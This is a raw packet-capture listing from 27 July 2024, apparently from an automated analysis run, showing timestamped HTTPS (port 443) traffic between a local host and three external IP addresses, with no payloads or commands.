Jul 27, 2024 07:44:08.314013958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314022064 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314044952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314076900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314100981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314169884 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:08.314275026 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:08.314285040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314322948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314362049 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:08.314367056 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314373016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314409018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314464092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314507008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314524889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314532042 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314557076 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314563990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314670086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314716101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314730883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314738989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.314769030 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314775944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.314991951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315033913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315049887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.315057993 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315080881 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.315088987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.315191984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315234900 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315249920 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.315258026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.315282106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.315289974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.316912889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.316963911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.316992998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.316998959 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317025900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317039013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317101002 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317126036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317154884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317161083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317183018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317187071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317190886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317199945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317224026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317234993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317240953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.317272902 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.317282915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.329262972 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:08.329329967 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:08.329365969 CEST	62253	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:08.329384089 CEST	443	62253	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:08.363236904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.363296986 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.371552944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.371601105 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.371644974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.371655941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.371685982 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.371706963 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372082949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372128963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372158051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372164011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372179985 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372211933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372308016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372348070 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372370005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372376919 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372410059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372419119 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372558117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372596979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372613907 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372622013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372637987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372658014 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372854948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372900963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372917891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372925043 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.372953892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.372967005 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.405592918 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.405636072 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.405821085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.405841112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.405862093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.406023026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.406023979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.406054020 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.406091928 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.406106949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.406121969 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.406145096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.411770105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.459428072 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.459475040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.459662914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.459662914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.459683895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460176945 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460221052 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460328102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460328102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460349083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460692883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460740089 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460757971 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460767984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460779905 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460798979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460813999 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460894108 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460937977 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460954905 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460962057 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.460988998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.460995913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.461093903 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.461137056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.461149931 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.461157084 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.461185932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.461191893 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.478143930 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:08.478193998 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:08.478281975 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:08.484153986 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:08.484172106 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:08.493272066 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493314028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493443966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493443966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493464947 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493493080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493655920 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493679047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493679047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493700027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493720055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.493737936 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493781090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.493789911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.537250996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.546992064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547034979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547204018 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547224998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547312975 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547456026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547458887 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547508001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547549963 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547719955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547760010 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547784090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547790051 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.547800064 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547822952 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.547827959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548008919 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548048019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548068047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548074007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548099995 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548111916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548222065 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548261881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548281908 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548289061 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.548301935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.548326015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581110954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581166029 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581305027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581305027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581326008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581372976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581422091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581463099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581484079 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581490993 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581516027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581530094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581655025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581701040 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581720114 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581727028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.581754923 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.581765890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.589072943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635066986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635113001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635158062 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635179043 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635194063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635307074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635390997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635390997 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635417938 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635459900 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635493040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635516882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635581017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635620117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635653019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635658979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635668993 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635695934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635878086 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635920048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635955095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.635961056 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.635979891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.636006117 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.636077881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.636121035 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.636145115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.636151075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.636173010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.636178970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.661829948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.668776989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.668823004 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.668838024 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.668880939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.668888092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669061899 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669109106 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669116020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.669136047 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669163942 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.669186115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.669267893 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669308901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669325113 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.669333935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.669358015 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.669373035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.682331085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.721946955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.721992016 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722021103 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722034931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722057104 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722078085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722217083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722259998 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722281933 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722289085 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722306013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722317934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722771883 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722810984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722832918 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722839117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.722863913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.722877979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723062038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723104000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723118067 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723124981 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723150969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723165035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723277092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723326921 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723340988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723354101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.723366022 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.723391056 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.724961996 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757217884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757265091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757281065 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757297039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757318020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757325888 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757462978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757503033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757522106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757530928 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757544041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757584095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757656097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757699013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757715940 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757723093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.757745981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.757754087 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811125994 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811167955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811229944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811244011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811255932 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811305046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811356068 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811364889 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811387062 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811413050 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811443090 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811817884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811857939 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811882019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811887980 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.811913013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.811932087 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812024117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812064886 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812079906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812087059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812122107 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812335014 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812375069 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812380075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812390089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812410116 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.812441111 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.812463999 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.844861984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.844906092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.844943047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:08.844957113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:08.844980955 CEST	62252	443	192.168.2.4	185.149.100.242
